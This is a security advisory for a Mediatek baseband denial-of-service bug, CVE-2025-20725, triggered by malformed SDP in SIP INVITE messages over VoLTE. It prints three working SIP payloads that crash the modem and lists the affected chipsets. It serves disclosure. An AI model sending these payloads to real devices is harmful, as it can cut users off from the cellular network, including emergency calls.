An attacker sending a malformed SIP message over VoLTE to a device with a Mediatek baseband can trigger the vulnerability described here.

The impact is DoS in the baseband, triggered by malformed VoLTE message such as SIP INVITE or MESSAGE request.

The vulnerability described in this advisory affected a wide range of Mediatek devices. This vulnerability is assigned CVE-2025-20725.

Vulnerability Details

Crash happens due to a NULL access.

The crash happens in sdp_msg_create_negotiation_sdp.

It is caused by a malformed audio attribute for RTP/AVP resulting in a NULL pointer access, which crashes the modem.

Example payload

The following SIP messages were tested:

INVITE sip:1 SIP/2.0
Content-Type: application/sdp
From: <sip:2>;tag=659747293
To: <sip:1>
CSeq: 1 INVITE

v=0
o=0 0 0 IN IP4 0
s=0
t=0 0
m=audio 0 RTP/AVP 0
a=des: & Bg %GAm

variants:

INVITE sip:1 SIP/2.0
Content-Type: application/sdp
From: <sip:2>;tag=659747293
To: <sip:1>
CSeq: 1 INVITE

v=0
o=0 0 0 IN IP4 0
s=0
t=0 0
m=audio 49170 RTP/AVP 0
a=curr:x a b

INVITE sip:1 SIP/2.0
Content-Type: application/sdp
From: <sip:2>;tag=659747293
To: <sip:1>
CSeq: 1 INVITE

v=0
o=0 0 0 IN IP4 0
s=0
t=0 0
m=audio 49170 RTP/AVP 0
a=conf:x a b

Affected Devices

Includes most, possibly all, of the following devices:

MT6739, MT6761, MT6762, MT6762D, MT6762M, MT6763, MT6765, MT6765T, MT6767, MT6768, MT6769, MT6769K, MT6769S, MT6769T, MT6769Z, MT6771, MT6779, MT6781, MT6783, MT6785, MT6785T, MT6785U, MT6789, MT6813, MT6833, MT6833P, MT6835, MT6835T, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6878, MT6878M, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6897, MT6899, MT6980, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT6991, MT8666, MT8667, MT8673, MT8675, MT8676, MT8678, MT8765, MT8766, MT8766R, MT8768, MT8771, MT8781, MT8786, MT8788, MT8788E, MT8789, MT8791, MT8791T, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893

Timeline

  • 2025.06.23. Bug reported to Mediatek PSIRT
  • 2025.07.23. Mediatek confirms vulnerability, does not assign CVE due to low severity
  • 2025.10.01. Advisory release